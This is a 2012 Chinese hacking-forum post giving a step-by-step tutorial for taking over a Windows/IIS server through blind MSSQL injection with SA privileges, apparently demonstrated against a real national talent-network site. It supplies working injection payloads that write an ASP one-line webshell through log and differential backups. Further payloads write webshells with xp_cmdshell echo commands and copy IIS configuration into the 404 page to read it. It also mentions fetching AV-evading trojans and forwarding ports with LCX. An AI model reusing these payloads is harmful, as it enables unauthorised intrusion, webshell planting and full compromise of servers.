找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
返回列表 发新帖
查看: 2963|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
# L- Z3 e+ T5 V4 }* w( o9 A% ^3 c8 c1 p  h, f

$ n5 Q; O8 i: j% ^: \                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
8 |. ?( i$ J( j; d" y* O( }- c9 a$ V" q
                                                                 ) h8 `& P" i: S. I
                                                                 , R/ b, T5 ]5 r6 o+ X
                                                                  论坛: http://www.90team.net/( T" h' Y8 I) p
2 Q( e+ _; @* w! X, k

5 F# i! u5 _5 V3 y" K
* C9 b8 [# K) ?! s5 g友情检测国家人才网
# j, k( ?& H2 \
5 U0 \! Y& s' D. h9 I3 R
" q" @4 d, C( H# I, Y, p内容:MSSQL注入SA权限不显错模式下的入侵! A7 _7 f: k3 I
* v- E4 v! q. O6 C

# L, t' O$ I1 b9 h) }9 I8 O一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。" c" H  W9 R8 ?! w, T; U4 H
( y! N  _) k! u  Z8 S" q: M7 S8 x
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
; K; O4 K: e% P3 N9 |. i8 e9 d) f# x) t/ x
/ y: i" w0 F4 ]$ T* y; U4 a! t  I
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。* F( b* ^! p: e# O3 I5 g6 Y8 A

* p1 d- o: {- b) _7 K  E$ X思路:
# M0 j) ~2 c& ]4 |& p9 ~8 T$ R2 f! n, x- Z7 H* E. {1 T3 b3 F
首先:
# d% A% p" @, ?' U! Q3 o
6 ]8 `9 K# a" a" L( v( W1 ^通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。- ?7 A9 C7 ], k& H* S0 t
9 M. n' c) [( r+ K
1.日志备份获得Webshell
/ M/ f1 J5 v2 h
! [- [9 G5 n; n  U. E* H6 b2.数据库差异备份获得Webshell
3 s* M  W6 h4 H. F( E
; v; [% \$ k' M1 J# z4.直接下载免杀远控木马。& e  y, T9 I5 |/ Z3 K5 d3 d
- C& D! V2 q3 |. {" r" X0 X
5.直接下载LCX将服务器端口转发出来* Z* u: P3 A/ ?2 @! E5 O, o
, T0 t  d, o4 }: b
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。6 L$ l  a) M& x. ^
: ^: N2 K$ P$ K9 F9 e
8 ~1 s( ]1 Y  q/ h

% a+ ?. o9 p; s3 H% j" x在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, . B! t& u' Z8 ^/ Q

. b4 X  H" r+ T; H: V我直接演示后面一个方法' ]% |) F7 N) F! z% J
- a+ r4 i9 P9 y/ s9 ]  P% r
+ V, u# Q( R3 H+ Q' x
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
/ G$ i& y; y3 b: g3 x
# X: W, i7 h" x( A7 X0 a) Y" x: [( X' L3 X
3 ?6 n) v! Z$ \6 B1 k
5 F- Z- V6 B! K2 o
◆日志备份:7 Q, n% V& v# ^1 g
5 Q, _& O) W8 ^4 |
5 Q! I, Y7 f; j9 l' R' Z
1. 进行初始备份- k. ~# }* d5 @% u0 L$ p" F
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--  P! k" |5 H* E/ Q0 y. N$ Z( \
4 v3 g, E) O# `
2. 插入数据: e, L5 {; @5 y$ z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
% i6 a. \4 I- Z2 @. p: G: _0 d) l6 N9 u( p
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
& T6 F& L6 ^: `3 M  
/ J! O( a2 ^; o# M" y3. 备份并获得文件,删除临时表% r( o0 z( N: [
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--* }& A) c* w4 Q4 H) P2 d  t; E
- e  [! ?6 X6 k8 f. K
0 G$ U- a" z* i' ^( b. e- i" ~

( B3 x4 g6 J/ i. Y0 L1 Y◆数据库差异备份
' N: [+ d9 Y4 v; i8 d5 z8 M9 X$ T/ n* c8 g: e+ E0 e, }
(1. 进行差异备份准备工作/ E# Y4 I, z1 U6 c8 R' B  y' T

$ @/ h- d1 n5 v# C1 \  F- x" K1 ^;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--' ~2 B4 f* S  c7 ?" P. E
  d: J( t9 Z1 i' P/ G( |8 `# D
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码8 w+ W& r/ q! k+ B

4 T- d% ]% O- n* A
$ I  V0 ]- F. K1 ^) B! f4 ~(2. 将数据写入到数据库
6 c' e+ `8 Z% w% c6 u2 }) c;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
" ^  p0 I& w. a6 X' h/ b' X$ r# a: C/ V6 ]
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>0 ?3 Y: n! k$ b9 j- G

  Q6 i# J" q7 k6 p+ K4 R3 c( S4 o3. 备份数据库并清理临时文件
) h) |! q* J2 F; p; D) B' ?5 O7 H
" q) u/ ?: n% J( _1 v' Q% X;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--$ G0 \7 C' z8 H

( ~% V, l2 R: x3 K0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 4 ^7 h' T( s( v) p, e5 y
) Y( x! u$ o2 K! L
8 k! T  u: D- x2 J3 U7 d

0 p& S9 ?) r$ D8 a用^转义字符来写ASP(一句话木马)文件的方法:   " m' y3 I, {. W/ V8 U; j* _7 Q! `/ X  ?
2 w) }% P0 q: _' R4 C4 I6 Z( J7 r
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--# q' r+ X% ^- @5 R, f3 o+ S# c, e: ]
0 G3 F+ \  Y6 h" ~& s. S+ G
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp   x, Q- n( m* O

# a; ~- o; n+ U读取IIS配置信息获取web路径
( q! D% \( R# _/ a( |! ]* u
- S' S; ^& j! T, n7 o     
: `# [6 _0 j  ^2 W     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
; h6 }' |# ?' f; A9 t2 E' ]
2 L% S, k* |( w. @( h* m1 o2 Y% f执行命令
1 l$ `, d+ t  j- `- h- f7 p  o) g4 h' Q     + x' O' N0 P% U, ^, O7 d9 f
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
4 V) D2 Q% Z: Z% y
9 b7 g) [2 n) q$ I7 B$ f% W- W4 i) q, J% J5 H1 P
1 i# d# C) d) {. n# _1 B) k- Z

9 X# l5 r6 }2 V( e
! D" ?3 e  {5 l5 {- ]: p" x
. s+ }' z% f' o) w. l) z' w5 ~; k9 b3 P+ u6 `
7 S% w/ K% E, K

" i( S5 `# `5 n6 {2 |
7 v5 C% I+ |6 ?& o) y* [: Z  ^
9 p, E$ L, e+ I# y1 x3 g8 V0 n- P
- W( p$ [0 Z9 E- R! x6 y) a3 M8 g; l& B

& s+ s: w; Q5 @3 b/ d; q, V: {
# P, b3 V+ @5 ^. D
7 T& ?+ V# y  g# j) Y2 u/ B8 Y
" B, ?4 H# l4 P% @  g% c
  }) `% C. D# s: `+ p: C$ O9 M4 [6 c) `1 s& ?. P5 _! ~6 ?; e' \

# h* ?6 Q, @; p( F" n4 C
) o# U% z: V) F6 H  s+ N5 @- [# N$ h
5 `& L* {! X% R

' U4 P) V6 x6 r5 |5 i- Q+ H8 @  C
6 t. k+ P( U4 D4 T2 T- K4 X- i/ n: S/ p5 ]9 @
% `0 l* @% `. z* p9 `7 [3 g2 G# W
4 y; @- ^! a) L# L
; _7 I$ t1 {2 e+ b9 |8 Q& ]

2 k( z$ z: k8 y: U+ Q" z" ]& @$ r4 P1 O5 y
, @- J, d/ S$ W: |# F  ]4 Y
- \9 b! @+ O6 ^. E2 P3 f

2 O7 P% V0 ?% P5 B! U- n, r
# j" t( l+ [* U2 V' g; l2 o
! i3 r* y5 i# V0 x4 y: g. G( ]. M& i4 i# \. @% d, w$ B
, \( C( o/ u" }8 f2 p
7 z4 ]9 W1 E$ n. Z, j- ]9 T

8 E1 j6 k/ }1 S; j% [4 N! D( y% k0 a5 B2 T6 f

( w( O  k  k' Q% q/ W5 L* d
2 L# W) h5 j: n- P5 t( r. z  S: X7 Q7 j+ h7 Y9 w
0 [- u! }+ L. T; z
) Z* C  d$ P* x( Y- T

' w, q7 I3 |# M4 [. R0 `* J' l# t' r7 q% P# B1 O# A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表